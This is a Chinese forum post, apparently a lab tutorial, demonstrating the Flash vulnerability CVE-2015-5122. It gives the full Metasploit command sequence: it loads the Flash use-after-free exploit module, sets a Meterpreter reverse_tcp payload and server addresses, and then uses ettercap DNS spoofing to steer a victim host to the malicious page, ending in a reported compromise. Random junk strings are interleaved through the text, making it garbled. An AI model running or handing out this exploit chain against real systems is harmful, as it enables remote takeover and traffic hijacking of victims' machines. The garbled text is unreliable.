找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1581|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

" t. q9 V. t/ t* U( \; q! B) x. g 二、cve2015-5122漏洞实例演示虚拟机 8 |) }6 n7 k) y% s% c/ h j4 e3 z8 ]2 {

/ D3 P0 h9 `: \ e; V- S

% I% I; E9 B3 V* _' ^   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: - Q* m+ k# B( p" t

/ @- M0 M! k! C Z$ P4 `2 p: f! K

H- E3 j5 `& {6 [; j search cve-2015-5122如图: , e& [5 l# I4 k- ]

4 F3 d/ o6 G7 F) D% Y# I

6 D3 b" B- X2 g/ b; x   ( J+ H" P3 c; g( H

! ?- K6 F2 Y: ], F8 P' y

( c1 a; B8 g+ _% c* F0 q" J- v3 Y 下面我们敲如下命令: / z2 b" t; T" H, C! O

; w8 f- V: w5 Y$ p

6 N+ `5 K( e1 P+ ] use exploit/multi/browser/adobe_flash_opaque_background_uaf 4 ~: q$ m- a& |& U2 w4 \: ~1 s; M

3 Z/ P9 G( M6 a u, v% V

8 v, ~# v* v' J2 \' F% {4 ~8 g set PAYLOAD windows/meterpreter/reverse_tcp ) x& u- Q5 H2 Q- L9 t4 G

& Q3 i4 G* m9 g$ b

6 [. Q% d2 D( O& J8 t) k- s* z3 r set LHOST 192.168.0.109 1 P i, X& n7 q. j

0 x* v0 \! L9 k$ T- g- g+ d1 F

) C$ [/ x: w* v0 e4 p set URIPATH /                        /*根目录*/ N1 W5 X0 \& j/ C# x! i5 z

2 f) L" ]& x) Q6 {' @2 B( N

, E, M- j6 k" l7 | set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 % f; B5 q. Q7 Q& x# I

; K% j- l2 @" U8 S" h) Z- V

% I7 O( q- g, J7 ^ set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 3 G6 N0 b/ d; C# n8 P

* D9 P( ?1 _1 o- Y

5 y) X2 \3 k- m/ [9 Y 然后show options如图: 9 }' ^- N2 n4 Z ?2 _1 [4 E/ o

0 C" O X. ^( v. {5 g+ J N7 l

- A g6 A4 B4 U& J   $ d4 x, D) F3 b3 f2 l1 w4 s

0 @, c; T( O" T: e

6 B C" d1 n, c( [7 v$ {% p6 }' y* {% W 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
/ g% A6 [3 S4 c5 T
- V9 |/ a+ [3 M2 b; { K" Y# k

' A! X* Z' c5 a9 _: |& m1 C M7 H

3 y# h1 d W; j; y$ K 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 0 K3 P6 j% w5 G# i8 E: |5 ~

6 G4 M* T7 U5 ^

! A, B9 k% x |- F! k1 M/ S; i Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf $ w$ t; ?1 \$ H l6 K" A

& X- E$ M) {, q# j4 D

& }7 E6 e. r* ]6 m# _$ ^8 r) p   ( _# T' z- J9 k- i) r0 J

" j& F/ V9 R) s# J

9 U& a; ^8 R& T. p/ ?0 E 成功了,这时候我们断开ettercap,如图: " e& P& R' ?$ Z; i' q2 R

" y- B Y* M# \

a4 P3 ? O0 B" b3 x+ J4 P   - k5 k1 s/ y9 m$ E" N1 }' l! j

0 i+ D5 F3 E4 _

( x& F) R# I5 n, b' ] Screenshot如图: : Q3 E2 W& R. X- I8 {

9 S Z: M: T' L, r1 A+ i' |

2 s- X- i4 ?1 E/ P. |   * Y, d, V/ O% ^- V

; I8 j7 f8 F0 G3 e( r9 `4 K1 M, j

* K3 y2 I0 F; l& R+ j* Z ! w5 C( r s& z7 ^4 h7 A

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表